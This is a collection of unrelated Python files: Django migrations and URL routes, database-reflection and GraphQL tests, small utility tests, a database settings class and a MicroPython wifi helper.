('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='codescheme_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CommentCodeInstance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Comment')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='commentcodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='SubmissionCodeInstance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateTimeField(auto_now_add=True, null=True)),
('modified_date', models.DateTimeField(auto_now=True, null=True)),
('deleted_date', models.DateTimeField(blank=True, null=True)),
('assignment', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='coding.Assignment')),
('code', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.Code')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_created_by', to=settings.AUTH_USER_MODEL)),
('deleted_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_deleted_by', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submissioncodeinstance_modified_by', to=settings.AUTH_USER_MODEL)),
('submission', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Submission')),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='code',
name='scheme',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='coding.CodeScheme'),
),
migrations.AddField(
model_name='assignment',
name='code_schemes',
field=models.ManyToManyField(to=b'coding.CodeScheme'),
),
migrations.AddField(
model_name='assignment',
name='coder',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='deleted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_deleted_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='assignment',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='assignment_modified_by', to=settings.AUTH_USER_MODEL),
),
]
| python |
import json
from nebulo.sql.reflection.function import reflect_functions
from sqlalchemy.dialects.postgresql import base as pg_base
CREATE_FUNCTION = """
create table account(
id int primary key,
name text
);
insert into account (id, name)
values (1, 'oli');
create function get_account(id int)
returns account
as $$
select (1, 'oli')::account;
$$ language sql;
"""
def test_reflect_function_returning_row(engine, session):
session.execute(CREATE_FUNCTION)
session.commit()
functions = reflect_functions(engine, schema="public", type_map=pg_base.ischema_names)
get_account = functions[0]
res = session.execute(get_account.to_executable([1])).first()
print(res)
# psycopg2 does not know how to deserialize row results
assert res == ("(1,oli)",)
def test_integration_function(client_builder):
client = client_builder(CREATE_FUNCTION)
query = """
mutation {
getAccount(input: {id: 1, clientMutationId: "abcdef"}) {
cmi: clientMutationId
out: result {
nodeId
id
}
}
}
"""
with client:
resp = client.post("/", json={"query": query})
result = json.loads(resp.text)
print(result)
assert resp.status_code == 200
assert result["errors"] == []
assert result["data"]["getAccount"]["out"]["id"] == 1
assert result["data"]["getAccount"]["out"]["nodeId"] is not None
assert result["data"]["getAccount"]["cmi"] == "abcdef"
| python |
# code modified from https://stackoverflow.com/questions/38401099/how-to-count-one-specific-word-in-python/38401167
import re
filename = input('Enter file:') # you can input any .txt file here. you need to type the path to the file.
# you can try the file in this folder: text_diamond.txt
handle = open(filename, 'r')
counts = dict()
for word in handle.read().split():
if word not in counts:
counts[word] = 1
else:
counts[word] += 1
print(counts)
# print only the count for my_word instead of iterating over entire dictionary
#my_word = "Shine"
# print(my_word, counts[my_word])
| python |
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='store-home-page'),
path('login/', views.login, name='login-page'),
path('signup/', views.signup, name='signup-page'),
]
| python |
N = int(input())
X = list(map(int,input().split()))
menor = X[0]
pos = 0
for k in range(1,N):
if X[k] < menor:
menor = X[k]
pos = k
print("Menor valor: %d" % (menor))
print("Posicao: %d" % (pos))
| python |
"""
Utilities Tests
---------------
"""
from poli_sci_kit import utils
def test_normalize():
assert sum(utils.normalize([1, 2, 3, 4, 5])) == 1.0
def test_gen_list_of_lists():
test_list = [0, 1, 2, 3, 4, 5, 6, 7, 8]
assert utils.gen_list_of_lists(
original_list=test_list, new_structure=[3, 3, 3]
) == [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
def test_gen_faction_groups():
test_list = ["a", "b", "c", "d", "e", "f"]
assert utils.gen_faction_groups(
original_list=test_list, factions_indexes=[[0, 1, 5], [2, 3, 4]]
) == [["a", "b", "f"], ["c", "d", "e",]]
def test_semiscirled_parl_plot(allocations):
assert list(
utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=False,
)["row"]
) == [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert list(
utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=False,
)["row_position"]
) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
test_df = utils.gen_parl_points(
allocations=allocations, style="semicircle", num_rows=2, speaker=True,
)
assert test_df["x_loc"][len(test_df) - 1] == 0
assert test_df["y_loc"][len(test_df) - 1] == 0
def test_rectangle_parl_plot(allocations):
assert list(
utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)["row"]
) == [0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3]
assert list(
utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)["row_position"]
) == [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 0, 1, 2, 3, 4]
test_df = utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=True,
)
assert test_df["x_loc"][len(test_df) - 1] == 0
assert test_df["y_loc"][len(test_df) - 1] == 4
def test_swap_parl_allocations(allocations):
test_df = utils.gen_parl_points(
allocations=allocations, style="rectangle", num_rows=4, speaker=False,
)
test_swap_df = test_df.copy()
utils.swap_parl_allocations(df=test_swap_df, row_0=0, pos_0=0, row_1=0, pos_1=1)
assert test_df["group"][0] == test_swap_df["group"][1]
def test_hex_to_rgb():
assert utils.hex_to_rgb("#ffffff").get_value_tuple() == (1.0, 1.0, 1.0)
def test_rgb_to_hex():
assert utils.rgb_to_hex((1.0, 1.0, 1.0)) == "#ffffff"
def test_scale_saturation():
assert utils.scale_saturation((1, 1, 1), 0.95) == (0.95, 0.95, 0.95)
| python |
from tark import constants
class DBSettings(object):
def __init__(self,
db_type=constants.DEFAULT_DB_TYPE,
db_name=constants.DEFAULT_DB_NAME,
db_user=constants.DEFAULT_DB_USER,
db_password=constants.DEFAULT_DB_PASSWORD,
db_node=constants.DEFAULT_DB_NODE,
**kwargs):
self.db_type = db_type
self.db_name = db_name
# db specific config parameters
self.db_user = db_user
self.db_password = db_password
self.db_node = db_node
self.db_configuration = dict()
if self.db_user is not None:
self.db_configuration["user"] = self.db_user
if self.db_password is not None:
self.db_configuration["password"] = self.db_password
if self.db_node is not None:
self.db_configuration["host"] = self.db_node
self.extra_config = dict(**kwargs)
self.db_configuration.update(**self.extra_config)
def get_settings(self):
return dict(db_type=self.db_type,
db_name=self.db_name,
db_user=self.db_user,
db_password=self.db_password,
db_node=self.db_node,
**self.extra_config) | python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# (C) 2011 Alan Franzoni. APL 2.0 licensed.
from unittest import TestCase
from abc import abstractmethod
from pydenji.ducktypes.function_copy import copy_raw_func_only, fully_copy_func
@abstractmethod
def example_func(a, b, c=1):
return 1
class AbstractTestFunctionCopy(object):
def test_function_wrapper_preserves_function_arg_count(self):
wrapped = self.copy_func(example_func)
self.assertEquals(3, wrapped.func_code.co_argcount)
def test_function_wrapper_preserves_function_return_value(self):
wrapped = self.copy_func(example_func)
self.assertEquals(1, wrapped(1,2))
def test_wrapped_func_is_actually_a_copy(self):
wrapped = self.copy_func(example_func)
wrapped.someattribute = 3
self.assertFalse(getattr(example_func, "someattribute", False))
class TestRaw(AbstractTestFunctionCopy, TestCase):
def setUp(self):
self.copy_func = copy_raw_func_only
def test_wrapped_function_is_never_abstract(self):
wrapped = self.copy_func(example_func)
self.assertFalse(getattr(wrapped, "__isabstractmethod__", False))
class TestCopyFuncFully(AbstractTestFunctionCopy, TestCase):
def setUp(self):
self.copy_func = fully_copy_func
def test_wrapped_function_abstract_attributes_are_copied(self):
wrapped = self.copy_func(example_func)
self.assertTrue(wrapped.__isabstractmethod__)
| python |
# Standard utils file
# Developed by Anodev Development (OPHoperHPO) (https://github.com/OPHoperHPO)
import time
import network
def wifi_connect(SSID, PASSWORD):
"""Connects to wifi."""
sta_if = network.WLAN(network.STA_IF)
if not sta_if.isconnected():
print('Connecting to network...')
sta_if.active(True)
sta_if.connect(SSID, PASSWORD)
timer = 30
while not sta_if.isconnected():
if timer == 0 and sta_if.isconnected() is False:
return False
time.sleep(1)
timer -= 1
print('Network config:', sta_if.ifconfig())
return sta_if
| python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.